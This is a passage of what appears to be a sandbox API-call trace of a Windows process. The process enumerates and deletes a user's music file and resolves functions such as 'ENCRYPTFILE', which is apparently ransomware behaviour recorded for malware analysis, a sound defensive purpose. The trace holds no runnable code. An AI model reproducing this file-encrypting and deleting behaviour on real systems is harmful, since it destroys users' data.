hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0115.360] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0115.360] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3", lpFilePart=0x0) returned 0x3c [0115.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5030 [0115.360] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\4yrchoozsp.mp3")) returned 0x20 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0115.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a41d8 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0115.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a41d8 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0115.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.361] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4a8760, ftCreationTime.dwHighDateTime=0x1d5e604, ftLastAccessTime.dwLowDateTime=0x1d7d5360, ftLastAccessTime.dwHighDateTime=0x1d5ee73, ftLastWriteTime.dwLowDateTime=0x1d7d5360, ftLastWriteTime.dwHighDateTime=0x1d5ee73, nFileSizeHigh=0x0, nFileSizeLow=0xafc6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="4YRCHooZsp.mp3", cAlternateFileName="4YRCHO~1.MP3")) returned 0x41ac440 [0115.361] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\4yrchoozsp.mp3")) returned 1 [0115.408] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4a8760, ftCreationTime.dwHighDateTime=0x1d5e604, ftLastAccessTime.dwLowDateTime=0x1d7d5360, ftLastAccessTime.dwHighDateTime=0x1d5ee73, ftLastWriteTime.dwLowDateTime=0x1d7d5360, ftLastWriteTime.dwHighDateTime=0x1d5ee73, nFileSizeHigh=0x0, nFileSizeLow=0xafc6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="4YRCHooZsp.mp3", cAlternateFileName="4YRCHO~1.MP3")) returned 0 [0115.408] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5030 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0115.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0115.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41818b0 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0115.409] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.409] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.409] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0115.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0115.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43e87e8 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0115.410] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0115.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.411] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.411] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dee1750, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x8f87cd00, ftLastAccessTime.dwHighDateTime=0x1d5ef0e, ftLastWriteTime.dwLowDateTime=0x8f87cd00, ftLastWriteTime.dwHighDateTime=0x1d5ef0e, nFileSizeHigh=0x0, nFileSizeLow=0x13ad5, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="g4kPqWyZSQA5pz.wav", cAlternateFileName="G4KPQW~1.WAV")) returned 0x41ac600 [0115.411] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0115.411] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0115.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0115.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0115.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.412] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0115.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0115.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0115.412] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0115.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0115.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0115.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0115.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0115.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0115.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 